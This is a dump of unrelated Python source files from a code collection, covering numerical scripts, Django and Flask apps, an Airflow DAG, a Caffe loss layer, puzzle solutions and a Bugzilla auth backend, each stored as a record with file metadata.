[a_matrices[clone_number][column_number][-1]]\n for level_order in range(\n len(a_matrices[clone_number][column_number]) - 1\n ):\n k_matrices.append(\n b_matrices[-(level_order + 1)].dot(\n h_matrices[level_order].dot(k_matrices[-1])\n )\n + a_matrices[clone_number][column_number][-(level_order + 2)]\n )\n\n # Calculating the distribution of absorption sub-matrices for the *column_number* column\n distribution_column = [h_matrices[-1].dot(k_matrices[-1])]\n for level_order in range(len(k_matrices) - 1):\n matrix_term = (\n d_matrices[level_order].dot(distribution_column[-1])\n + k_matrices[-(level_order + 2)]\n )\n distribution_column.append(\n h_matrices[-(level_order + 2)].dot(matrix_term)\n )\n distribution[clone_number].append(distribution_column)\n\n # Storing Data\n\n folder = \"Hard\"\n if new_clone_is_soft:\n folder = \"Soft\"\n\n parameters_path = (\n f\"Results/Absorption distribution/{folder}/Parameters-{sample_value}.bin\"\n )\n data_path = f\"Results/Absorption distribution/{folder}/Data-{sample_value}.bin\"\n\n os.makedirs(os.path.dirname(parameters_path), exist_ok=True)\n os.makedirs(os.path.dirname(data_path), exist_ok=True)\n\n with open(parameters_path, \"wb\") as file:\n parameters = (\n [\n \"dimension_value\",\n \"max_level_value\",\n \"mu_value\",\n \"gamma_value\",\n \"stimulus_value\",\n ],\n dimension_value,\n max_level_value,\n mu_value,\n gamma_value,\n stimulus_value,\n )\n pickle.dump(parameters, file)\n\n with open(data_path, \"wb\") as file:\n pickle.dump(distribution, 
file)\n","sub_path":"Absorption-distribution.py","file_name":"Absorption-distribution.py","file_ext":"py","file_size_in_byte":7913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"128419388","text":"#!/usr/bin/env python\n#!/usr/bin/python\n\nimport os, sys\nimport numpy as np \nimport scipy as sp\nimport wave\nimport struct\nimport matplotlib.pylab as pl\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('threshold', type = int, help = 'you need to provide an integer threshold')\nargs = parser.parse_args()\nthreshold = args.threshold\n\n# Open a file\npath = \"/home/ubuntu/src/tf_p27/tensorflow/tensorflow/clouder/dataset/audio\"\nout = \"/home/ubuntu/src/tf_p27/tensorflow/tensorflow/clouder/dataset/spectrogram\"\ndirs = os.listdir(path)\n\n# This would print all the files and directories\nfor dir in dirs:\n\tfiles = os.listdir(path + \"/\" + dir)\n\touts = os.listdir(out + \"/\" + dir)\n\tif len(files) == len(outs): continue\n\tprint(\"start processing... \" + dir)\n\tcount = 0\n\tfor file in files:\n\t\tif (file + \".png\") in outs: continue\n\t\tif not file.endswith(\".wav\"): continue\n\t\tif count >= threshold: sys.exit(0)\n\t\twinsize=512\n\t\tshift=256\n\t\tfh=600 \n\t\tfl=60 \n\t\tfilename = file\n\t\twavefile = wave.open(path + \"/\" + dir + \"/\" + filename, 'r') # open for writing\n\t\tnchannels = wavefile.getnchannels()\n\t\tsample_width = wavefile.getsampwidth()\n\t\tframerate = wavefile.getframerate()\n\t\tnumframes = wavefile.getnframes()\n\t\t# get wav_data\n\t\twav_data = wavefile.readframes(-1)\n\t\twav_data = np.fromstring(wav_data, 'Int16')\n\n\t\tTime=np.linspace(0, len(wav_data)/framerate, num=len(wav_data))\n\n\t\tpl.figure(1)\n\t\tpl.title('Signal Wave...')\n\t\tpl.plot(Time,wav_data)\n\t\tFs = framerate\n\t\tpl.figure(2)\n\t\tpl.subplots_adjust(left=0,right=1,bottom=0,top=1)\n\t\tpl.specgram(wav_data, NFFT=1024, Fs=Fs, noverlap=512)\n\t\tpl.axis('off')\n\t\tpl.axis('tight')\n\t\tpl.savefig(out + \"/\" + dir + '/%s.png' % filename)\n\t\tcount += 1\n\t\tprint(dir + \": \" + count + \" for this round\")","sub_path":"Course-Project/readWAVfiles.py","file_name":"readWAVfiles.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"517712541","text":"\"\"\"\nDefines the REST API views for users models.\n\"\"\"\n\n\nfrom core import views\nfrom app_organizations.api.group.serializers import (\n AddUserSerializer, OrganizationGroupCreateSerializer,\n OrganizationGroupListSerializer, OrganizationGroupRetrieveSerializer,\n OrganizationGroupUpdateSerializer, RemoveUserSerializer)\nfrom app_organizations.models import OrganizationGroup\nfrom app_organizations.permissions import OrganizationDjangoModelPermissions\nfrom app_organizations.views import (BaseOrganizationListGetQuerySet,\n BaseOrganizationRetrieveGetQuerySet)\n\n\nclass OrganizationGroupsListCreateDestroyView(\n views.CoreListAPIView,\n views.CoreCreateAPIView,\n views.CoreListDestroyAPIView,\n BaseOrganizationListGetQuerySet):\n \"\"\"\n Defines the list-create-destroy view.\n \"\"\"\n\n lookup_field = 'name'\n lookup_url_kwarg = 'name'\n queryset = OrganizationGroup.objects.none()\n permission_classes = (OrganizationDjangoModelPermissions,)\n ordering_fields = ['name', 'authority']\n order_by = 'authority'\n # groups filtering with name conflicts with its lookup url name\n # filterset_fields = {\n # 'name': ['exact', 'icontains'],\n # }\n 
list_serializer = OrganizationGroupListSerializer\n create_serializer = OrganizationGroupCreateSerializer\n\n\nclass OrganizationGroupsRetrieveUpdateDestroyView(\n views.CoreRetrieveAPIView,\n views.CoreUpdateAPIView,\n views.CoreDestroyAPIView,\n BaseOrganizationRetrieveGetQuerySet):\n \"\"\"\n Defines the retrieve-update-destroy view.\n \"\"\"\n\n lookup_field = 'name'\n lookup_url_kwarg = 'name'\n queryset = OrganizationGroup.objects.none() # Added for model permissions\n permission_classes = (OrganizationDjangoModelPermissions,)\n\n retrieve_serializer = OrganizationGroupRetrieveSerializer\n update_serializer = OrganizationGroupUpdateSerializer\n\n\nclass AddUserView(\n views.CoreUpdateAPIView,\n BaseOrganizationRetrieveGetQuerySet):\n \"\"\"\n Defines the view for adding users to the group\n \"\"\"\n\n lookup_field = 'name'\n lookup_url_kwarg = 'name'\n queryset = OrganizationGroup.objects.none() # Added for model permissions\n permission_classes = (OrganizationDjangoModelPermissions,)\n update_serializer = AddUserSerializer\n\n\nclass RemoveUserView(\n views.CoreUpdateAPIView,\n BaseOrganizationRetrieveGetQuerySet):\n \"\"\"\n Defines the view for removing users from the group\n \"\"\"\n\n lookup_field = 'name'\n lookup_url_kwarg = 'name'\n queryset = OrganizationGroup.objects.none() # Added for model permissions\n permission_classes = (OrganizationDjangoModelPermissions,)\n update_serializer = RemoveUserSerializer\n","sub_path":"app_organizations/api/group/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"324631155","text":"def main():\n n = int(input())\n a = list(map(int, input().split()))\n \n def solve():\n if 0 in a:\n return 0\n ans = 1\n for aa in a:\n ans *= aa\n if ans >10**18:\n return -1\n return ans\n print(solve())\n \n \nif __name__ == '__main__':\n main()","sub_path":"atcoder.jp/abc169/abc169_b/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"440946008","text":"import logging\nfrom datetime import datetime, timedelta\nfrom pathlib import Path\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.contrib.operators.kubernetes_pod_operator import KubernetesPodOperator\n\nlog = logging.getLogger(__name__)\n\ndag = DAG(\n \"k8s_pod_operator\",\n schedule_interval=\"0 1 * * *\",\n catchup=False,\n default_args={\n \"owner\": \"admin\",\n \"depends_on_past\": False,\n \"start_date\": datetime(2020, 8, 7),\n \"email_on_failure\": False,\n \"email_on_retry\": False,\n \"retries\": 2,\n \"retry_delay\": timedelta(seconds=30),\n \"sla\": timedelta(hours=23),\n },\n)\n\nwith dag:\n task_1 = KubernetesPodOperator(\n image=\"ubuntu:16.04\",\n namespace=\"airflow-executor\", \n cmds=[\"bash\", \"-cx\"],\n arguments=[\"echo\", \"10\"],\n labels={\"foo\": \"bar\"},\n name=\"executor-task-1\",\n task_id=\"task-1-echo\",\n is_delete_operator_pod=False,\n in_cluster=True,\n )\n task_2 = KubernetesPodOperator(\n image=\"ubuntu:16.04\",\n namespace=\"airflow-executor\", \n cmds=[\"sleep\"],\n arguments=[\"300\"],\n labels={\"foo\": \"bar\"},\n name=\"executor-task-2\",\n task_id=\"task-2-sleep\",\n is_delete_operator_pod=False,\n in_cluster=True,\n )\n\ntask_1 >> 
task_2","sub_path":"dag/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"629380025","text":"\"\"\"\nQuestion 1:\nWrite a program to take the year as the input from the user. \nIf the current year is a leap year then print the day of the extra day in the year.\nIf the entered year is not a leap year, find the closest leap year either before or after the current year and then print the day of the extra day in the year. \n\nException case:\nIf the closest leap year either before or after is equidistant from the current year, print the day of the extra day in the year in both cases \n\nSample1:\nInput: 2012\nOutput:\nWednesday\n\nSample2:\nInput: 2013\nOutput:\nThis is not a leap year\nClosest leap year: 2012\nWednesday\n\n\"\"\"\n\nimport datetime\n\ndef find_day(num):\n \"\"\" Returns day \"\"\"\n lst = [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\", \"Sunday\"]\n return lst[num]\n\ndef find_date(year):\n \"\"\" creates date & calls find_day to get Day\"\"\"\n dateobj = datetime.date(year, 2, 29)\n num = dateobj.weekday()\n return find_day(num)\n\ndef find_leap_year(year):\n \"\"\" Finds Closest Leap Year\"\"\"\n if year%100==0 and year%400 != 0:\n year1 = year+4\n year2 = year-4\n print(\"year {} is a leap year\".format(year1))\n print(\"year {} is a leap year\".format(year2))\n print(find_date(year1))\n print(find_date(year2))\n else:\n if year%4 >2:\n year = year + (4-year%4)\n if year%100==0 and year%400 != 0:\n year = year - 4\n print(\"year {} is a leap year\".format(year))\n print(find_date(year))\n elif year%4 < 2:\n year = year - (year%4)\n if year%100==0 and year%400 != 0:\n year = year + 4\n print(\"year {} is a leap year\".format(year))\n print(find_date(year))\n else:\n flag1 = False\n flag2 = False\n year1 = year - 2\n year2 = year + 2\n if year%100==0 and year%400 != 0:\n flag1 = True\n if year%100==0 and year%400 != 0:\n flag2 = True \n if flag1 == False and flag2 == False:\n print(\"Leap year is equidistant from given year\")\n print(\"So two leap years are {0} and {1}\".format(year1, year2))\n print(find_date(year1))\n print(find_date(year2))\n elif flag1 == True:\n print(\"year {} is a leap year\".format(year2))\n print(find_date(year2))\n elif flag2 == True:\n print(\"year {} is a leap year\".format(year1))\n print(find_date(year1))\n\ndef check_leap_year(year):\n \"\"\" Checks Leap Year\"\"\"\n if year%100==0 and year%400 != 0:\n print(\"year {} is not a leap year\".format(year))\n find_leap_year(year)\n else:\n if year%4 == 0:\n print(\"year {} is leap year\".format(year))\n print(find_date(year))\n else:\n print(\"year {} is not a leap year\".format(year))\n find_leap_year(year)\n\n\n\nif __name__ == '__main__':\n year = int(input())\n check_leap_year(year)","sub_path":"question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"114234095","text":"import os\nimport sys\n\n# Import environments\nImport('opt','debug')\n\n# Make copies of imported environment to keep changes local\nopt = opt.Clone()\ndebug = debug.Clone()\n\n# Specialize debug environment\ndebug['CCFLAGS'] += ['-fopenmp']\ndebug.VariantDir('debug-build', '.', duplicate=0)\ndebug_src = debug.Glob('debug-build/*.c')\ndebug.Program('test-debug.out', source = debug_src)\nClean('.','debug-build')\n\n# Specialize opt 
environment\nopt['CCFLAGS'] += ['-fopenmp']\nopt.VariantDir('opt-build', '.', duplicate=0)\nopt_src = opt.Glob('opt-build/*.c')\nopt.Program('test-opt.out', source = opt_src)\nClean('.','opt-build')\n","sub_path":"tests/omp_atomic/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"575610790","text":"#!/usr/bin/env python\n\nfrom setuptools import setup, find_packages\n\nPACKAGE = 'aftracistan'\nVERSION = '0.1'\n\nsetup( name=PACKAGE, version=VERSION,\n author = 'John Hampton',\n author_email = 'pacopablo@asylumware.com',\n url = 'http://trac-hacks.org/wiki/TraciStanPlugin',\n description = \"\"\"\nExample plugin showing the use of the IStanRequestHandler\n\"\"\",\n license='BSD',\n\n packages = ['aftracistan'],\n package_data = { 'aftracistan' : ['htdocs/css/*.css', 'htdocs/img/*',\n 'templates/*.stan', ]},\n entry_points = {'trac.plugins': ['aftracistan = aftracistan']},\n install_requires = ['TracIStan']\n)\n","sub_path":"tracistanplugin/0.9/example/aftracistan/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"198788560","text":"#!/usr/bin/env python3\n\nwhile True:\n line = input()\n #print(f\"# BOT: line={line}\")\n if line[0] == '#': # this is a commented line (sent by the service server)\n if '# WE HAVE FINISHED' == line:\n exit(0) # exit upon termination of the service server\n else:\n n = int(line)\n print(f\"{n//2} {(n+1)//2}\")\n","sub_path":"example_problems/tutorial/sum/bots/python/without_library/free_sum_mymaxproductbot.py","file_name":"free_sum_mymaxproductbot.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"434243963","text":"import caffe\nimport numpy as np\nimport random\nimport xml.etree.ElementTree as et\n##############################################################################################################\n##############################################################################################################\n##############################################################################################################\nclass smoothL1Loss(caffe.Layer):\n\tdef setup(self,bottom,top):\n\t\tself.lambda_ = 10.0\n\t\tself.mini_batch = 256\n\n\tdef reshape(self,bottom,top):\n\t\ttop[0].reshape(1)\n\n\tdef forward(self,bottom,top):\n\t\tt_predict \t= bottom[0].data\n\t\tt_gt \t= bottom[1].data\n\t\tself.reg_p\t= bottom[2].data\n\t\tfeature_h,feature_w = self.reg_p.shape[-2:]\n\t\tself.feature_size = feature_h*feature_w\n\t\tself.diff = t_predict - t_gt\n\t\tloss = (self.lambda_/self.feature_size)*self.reg_p*self.smoothL1(self.diff)\n\t\ttop[0].data[...] = np.sum(loss)\n\n\tdef backward(self, top, propagate_down, bottom):\n\t\tif propagate_down[0]:\n\t\t\tbottom[0].diff[...] = (self.lambda_/self.feature_size)*self.reg_p*self.smoothL1_gradient(self.diff)\n\t\tif propagate_down[1]:\n\t\t\tbottom[1].diff[...] 
= -(self.lambda_/self.feature_size)*self.reg_p*self.smoothL1_gradient(self.diff)\n\n\tdef smoothL1(self,x):\n\t\ty = np.zeros_like(x) #(1,36,x,y)\n\t\td1,d2,d3,d4 = x.shape\n\t\tfor d1_ in range(d1):\n\t\t\tfor d2_ in range(d2):\n\t\t\t\tfor d3_ in range(d3):\n\t\t\t\t\tfor d4_ in range(d4):\n\t\t\t\t\t\tx_ = x[d1_][d2_][d3_][d4_]\n\t\t\t\t\t\tif x_> 1:\n\t\t\t\t\t\t\ty[d1_][d2_][d3_][d4_] = x_-0.5\n\t\t\t\t\t\telif x_<-1:\n\t\t\t\t\t\t\ty[d1_][d2_][d3_][d4_] = -x_-0.5\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ty[d1_][d2_][d3_][d4_] = 0.5*x_*x_\n\t\treturn y\n\tdef smoothL1_gradient(self,x):\n\t\ty = np.zeros_like(x) #(1,36,x,y)\n\t\td1,d2,d3,d4 = x.shape\n\t\tfor d1_ in range(d1):\n\t\t\tfor d2_ in range(d2):\n\t\t\t\tfor d3_ in range(d3):\n\t\t\t\t\tfor d4_ in range(d4):\n\t\t\t\t\t\tx_ = x[d1_][d2_][d3_][d4_]\n\t\t\t\t\t\tif x_> 1:\n\t\t\t\t\t\t\ty[d1_][d2_][d3_][d4_] = 1\n\t\t\t\t\t\telif x_<-1:\n\t\t\t\t\t\t\ty[d1_][d2_][d3_][d4_] = -1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ty[d1_][d2_][d3_][d4_] = x_\n\t\treturn y\n","sub_path":"python/smoothL1Loss.py","file_name":"smoothL1Loss.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"465449785","text":"#!/usr/bin/python\r\ns = [\"A\", \"A\", \"A\", \"A\", \"C\", \"C\", \"C\", \"G\", \"G\", \"T\"]\r\ns = ''.join(s)\r\npairs = {\r\n \"A\": \"T\",\r\n \"T\": \"A\",\r\n \"G\": \"C\",\r\n \"C\": \"G\"\r\n}\r\nc = []\r\nfor i in range(0, len(s), 1):\r\n c.append(pairs[s[i]])\r\nprint(list(reversed(c)))\r\n\r\n\r\nv = \"AAAACCCGGT\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Assignments/Assignment3.py","file_name":"Assignment3.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"12824033","text":"# -*- coding: utf-8 -*-\n# Create your views here.\n\nfrom newsletter.models import *\nfrom django.template.loader import get_template\nfrom django.views.generic.simple import redirect_to\nfrom django.shortcuts import render_to_response\nfrom django.core.mail import send_mail\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.http import HttpResponse\nfrom django.template import RequestContext\nimport datetime\nimport subprocess\nimport random\n\ndef gen_code():\n code = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890') for i in range(10)])\n return code\n\ndef subscribe(request):\n if not request.POST:\n return redirect_to(request, url='/') \n email = request.POST['email']\n mlist = [].append(email)\n code = gen_code()\n subscription_date = datetime.datetime.now()\n subscr = Subscriber(email=email, code=code, subscription_date=subscription_date)\n subscr.save()\n# body=u\"\"\"Otrzymałeś ten list, ponieważ na stronie www.nspj.bydgoszcz.pl podano Twój adres do wysyłki newslettera. Jeśli chcesz otrzymywać newsletter kliknij na link lub wklej poniższy adres do przeglądarki, żeby potwierdzić subskrypcję.Jeśli nie wpisywałeś swojego adresu po prostu wykasuj ten mail. \\n\"\"\" \n# body = body + \"http://www.nspj.bydgoszcz.pl/newsletter/accept/?code=\" + code\n# send_mail(\"Newsletter ze strony pjn-kujawskopomorskie.pl\",\n# body,\n# 'biuro@nspj.bydgoszcz.pl',\n# mlist\n# )\n komunikat = u\"\"\"Dziękujemy za wpisanie adresu. 
Newsletter będzie wysyłany na adres \"\"\" + email\n \n return render_to_response('subscribed.html', RequestContext(request, {\"komunikat\":komunikat} ))\n\ndef unsubscribe(request):\n if not request.GET['email']:\n return redirect_to(request, url='/')\n email = request.GET['email']\n subscr = Subscriber.objects.filter(email=email)\n n = subscr.count()\n for s in subscr:\n s.delete()\n if n:\n komunikat = u\"\"\"Adres \"\"\" + email + u\" został usunięty z naszej listy wysyłkowej.\"\n else:\n komunikat = u\"\"\"Adresu \"\"\" + email + u\" nie było na naszej liście!\"\n\n return render_to_response('subscribed.html', {\"komunikat\":komunikat} )\n\ndef make_html():\n from news.models import Newslet, News\n from django.template import Context\n from django.template.loader import get_template\n from datetime import datetime\n latest_newsletter = Newslet.objects.all().order_by('date').reverse()[0]\n t = get_template('newslet.html')\n news = News.objects.filter(newslet = latest_newsletter) \n html = t.render(Context({\"news\":news, \"date\":datetime.now()}))\n t = get_template('newslet.txt')\n txt = t.render(Context({\"news\":news, \"date\":datetime.now()}))\n return {'txt':txt, 'html':html, 'unsent':latest_newsletter.unsent}\n \n \n\n\ndef sending(request):\n if request.user.is_superuser:\n link = \"http://pjn-kujawskopomorskie.pl/newsletter/unsubscribe/?email=\"\n napis = u\"Otrzymałeś ten biuletyn, ponieważ Twój ares e-mail został podany na stronie www.polska-plus.pl. Jeśli nie chcesz otrzymywac biuletynu, możesz usunąć swój adres, korzystając z następującego linku: \"\n# adresy = Subscriber.objects.all()\n adresy = Probne.objects.all()\n# tresc_txt = Body.objects.all().order_by('sending_date').reverse()[0].text\n# tresc_html = Body.objects.all().order_by('sending_date').reverse()[0].text_html\n tresc = make_html()\n tresc_txt = tresc['txt']\n tresc_html = tresc['html']\n subject = u\"Newsletter portalu pjn-kujawskopomorskie.pl\"\n from_email = \"biuro@walkowiak.bydgoszcz.pl\"\n wszystkie = 0\n bledy = 0\n# return HttpResponse(u\"Newsletter zaczyna się wysyłać, treść poniżej:
    \" + tresc_html)\n for a in adresy:\n cale = napis + '' + link + a.email + ''\n txt = tresc_txt + '\\n' + cale\n htm = tresc_html + '

    ' + cale + '

    '\n htm = '' + htm\n bledy_opis = \"\"\n try:\n msg = EmailMultiAlternatives(subject, txt, from_email, [a.email,])\n msg.attach_alternative(htm, \"text/html\")\n msg.send()\n wszystkie = wszystkie + 1\n except:\n pass\n bledy = bledy+1\n bledy_opis=bledy_opis + a.email + \", \"\n \n return HttpResponse(u\"Newsletter wysłany :) maili: \" + str(wszystkie) + u\", błędów: \" + str(bledy) + u\"
    błędy: \" + bledy_opis )\n else:\n return HttpResponse(u\"Nie jesteś adminem\")\n\n\n","sub_path":"newsletter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"546996438","text":"# 2. Write a function to check if an integer array is a valid valley array. Given an integer array L, L is a valid valley array if and only if:\n# 1)\tL.length >= 3\n# 2)\tThere exists some i with 0 < i < L.length – 1 such that:\n# a.\tL[0] >= L[1] >= … >= L[i-1] > L[i]\n# b.\tL[i] <= L[i+1] <= … <= L[L.length – 1]\n\ndef validateArray(L):\n #check length\n if len(L) < 3:\n return False\n \n idx = 1\n decreasing = True\n #[6, 2, 1, 3]\n while decreasing and idx 0 :\n decreasing = False\n idx +=1\n\n if decreasing: \n # if it's still decreasing\n #still decrease even at the last integer\n return False\n\n increasing = True\n while increasing and idx 1:\n matrix[row][col][REMAIN] -= 1\n elif not matrix[row][col][SHARK] and matrix[row][col][REMAIN] == 1:\n matrix[row][col][SMELL], matrix[row][col][REMAIN] = 0, 0\n # print_board(matrix)\n\ndef check(matrix):\n cnt = 0\n for row in range(N):\n for col in range(N):\n if matrix[row][col][SHARK]:\n cnt += 1\n return cnt\n\ni, cnt = 0, check(board)\nwhile cnt > 1:\n i += 1\n if i > 1000:\n break\n # print('==========', i, '단계==========')\n move_shark(board)\n cnt = check(board)\nif cnt == 1:\n print(i)\nelse:\n print(-1)","sub_path":"BOJ/19237 어른 상어.py","file_name":"19237 어른 상어.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"505665997","text":"import dataset\nfrom preprocessing import *\nfrom models import *\nfrom evaluation import *\n\ndef main():\n\n data = dataset.UNDevGoalsDataset()\n \n print('Predicting 2007 from 1972:2006')\n \n X_simple,Y_simple = data.preprocess(pp_fn = preprocess_simple)\n status_quo_predictions_simple = data.predictions(model_name=status_quo_model, preprocessed_data=X_simple)\n status_quo_simple_rmse = data.error(error_fn=RMSE, predictions=status_quo_predictions_simple)\n print('Status quo model RMSE with simple preprocessing:', status_quo_simple_rmse)\n \n \n X_improved,Y_improved = data.preprocess(pp_fn = preprocess_avg_NANs)\n status_quo_predictions_improved = data.predictions(model_name=status_quo_model, preprocessed_data=X_improved)\n status_quo_improved_rmse = data.error(error_fn=RMSE, predictions=status_quo_predictions_improved)\n print('Status quo model RMSE with better preprocessing:', status_quo_improved_rmse)\n\n\n arima_predictions_simple = data.predictions(model_name=arima, order=(1,1,1), lookback=5, preprocessed_data=X_simple)\n arima_rmse_simple = data.error(error_fn=RMSE, predictions=arima_predictions_simple)\n print('ARIMA model RMSE with simple preprocessing:', arima_rmse_simple)\n \n arima_predictions_improved = data.predictions(model_name=arima, order=(1,1,1), lookback=5, preprocessed_data=X_improved)\n arima_rmse_improved = data.error(error_fn=RMSE, predictions=arima_predictions_improved)\n print('ARIMA model RMSE with better preprocessing:', arima_rmse_improved)\n \n\nif __name__ == '__main__':\n main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"643402074","text":"# -*- coding: utf-8 -*-\nfrom openerp import api, fields, models\nfrom 
odoo.addons.ihyf_payment_gateway.common.backend_common import *\n\n\nclass PaymentAlipay(models.Model):\n _name = 'payment.alipay'\n\n name = fields.Char(\n string='Name',\n required=True\n )\n\n payment_user_account_id = fields.Many2one(\n comodel_name='payment.user.account',\n string='Payment User Account',\n )\n\n seller_id = fields.Char(\n string='Seller ID',\n required=True\n )\n\n app_id = fields.Char(\n string='App ID',\n required=True\n )\n\n private_rsa = fields.Text(\n string='Private RSA'\n )\n\n account_id = fields.Char(\n string='Account ID'\n )\n\n @api.onchange('name')\n def onchange_name(self):\n if self.name:\n if not self.account_id:\n self.account_id = get_md5_string(self.name)\n","sub_path":"payment_gateway/models/payment_alipay.py","file_name":"payment_alipay.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"102827444","text":"from flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\nclass PrefixTree:\n def __init__(self):\n self.root = [{}]\n\n def add(self, string, jsn, rating):\n \n if self.check(string):\n return\n wrk_dict = self.root\n # print(wrk_dict)\n for i in string:\n if i in wrk_dict[0]: \n wrk_dict=wrk_dict[0][i] #опускаемся по строке по словарю\n if len(wrk_dict[2])<10:\n wrk_dict[2][rating] = [string, jsn] #МОЖНОНЕСРАВНИВАТЬ, просто пихаем\n else:#ЕСЛИ НАБРАНО, то на место той минимальной частоты ставим новый \n if rating > wrk_dict[1]:#Если рейтинг б минимального\n wrk_dict[2][wrk_dict[1]] = [string, jsn] \n \n wrk_dict[1]=min(wrk_dict[2].keys()) \n else:#Если его нет в словаре, то по нему пока положим данное в топ\n wrk_dict[0][i] = [{}, rating, {rating: [string, jsn]}]\n wrk_dict = wrk_dict[0][i]\n wrk_dict.append(True)\n #TODO добавить строку\n def check(self, string):\n wrk_dict = self.root\n for i in string:\n if i in wrk_dict[0]:\n wrk_dict = wrk_dict[0][i]\n else:\n return False\n #print(len(wrk_dict))\n #print(wrk_dict)\n if len(wrk_dict) == 4:\n return True\n return False\n #TODO проверить наличие строки\n \n def check_part(self, string):\n wrk_dict = self.root\n for i in string:\n if i in wrk_dict[0]:\n wrk_dict = wrk_dict[0][i]\n else:\n return False\n return True\n\n def top(self, string):\n top=[]\n if not self.check_part(string):\n return []\n wrk_dict=self.root\n #print(\"Передалось\")\n #print(wrk_dict)\n if self.check_part(string):\n for i in string:\n if i in wrk_dict[0]:\n wrk_dict=wrk_dict[0][i]\n #print(wrk_dict)\n index=[]\n list=[]\n for i in wrk_dict[2]:#В него клала топ\n #print(\"***\")\n index.append(int(i))\n list.append(wrk_dict[2][i])\n n=1\n while nindex[j+1]:\n index[j],index[j+1]=index[j+1],index[j]\n list[j],list[j+1]=list[j+1],list[j]\n n+=1\n return list\n \n #TODO реализация класса prefix tree, методы как на лекции + метод дать топ 10 продолжений. Скажем на строку кросс выдаем кроссовки, кроссовочки итп. Как хранить топ? \n #Решать вам. Можно, конечно, обходить все ноды, но это долго. 
Дешевле чуток проиграть по памяти, зато отдавать быстро (скажем можно взять кучу)\n #В терминальных (конечных) нодах может лежать json с топ актерами.\ndef init_prefix_tree(filename):\n with open(filename, 'r+') as f:\n for x in f:\n #x=f.read().strip()\n s = x.strip().split('/t')\n pr_tree.add(s[0],s[1],s[2])\n f.close()\npr_tree = PrefixTree()\ninit_prefix_tree('1.txt') \n\n@app.route(\"/get_sudgest/\", methods=['GET', 'POST'])\ndef return_sudgest(string):\n #TODO по запросу string вернуть json, c топ-10 саджестами, и значениями из нод\n \n json = jsonify(pr_tree.top(string))\n return json\n@app.route(\"/\")\ndef hello():\n #TODO должна возвращатьс инструкция по работе с сервером\n instr=\"Из файла загружаются данные. По введенному вами префиксу, вернется топ 10 популярных саджестов.\"\n return instr\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"homeworks/05/flask_prefix_tree.py","file_name":"flask_prefix_tree.py","file_ext":"py","file_size_in_byte":4444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"106348457","text":"import mnist_loader as loader\nfrom NN import NN\n\ndef main():\n training_data, validation_data, test_data = loader.load_data_wrapper()\n nn = NN([784,30,10])\n nn.SGD(training_data,30,10,3.0,test_data=test_data)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"NN/mnist/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"485981500","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport xmlrpclib\n\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import PermissionDenied\nfrom django.utils.translation import ugettext as _\nfrom djblets.siteconfig.models import SiteConfiguration\nfrom reviewboard.accounts.backends import AuthBackend\n\nfrom rbbz.forms import BugzillaAuthSettingsForm\nfrom rbbz.models import get_or_create_bugzilla_users\nfrom rbbz.transports import bugzilla_transport\n\n\nclass BugzillaBackend(AuthBackend):\n \"\"\"\n Authenticate a user via Bugzilla XMLRPC.\n \"\"\"\n\n backend_id = _('bugzilla')\n name = _('Bugzilla')\n login_instructions = _('using your Bugzilla 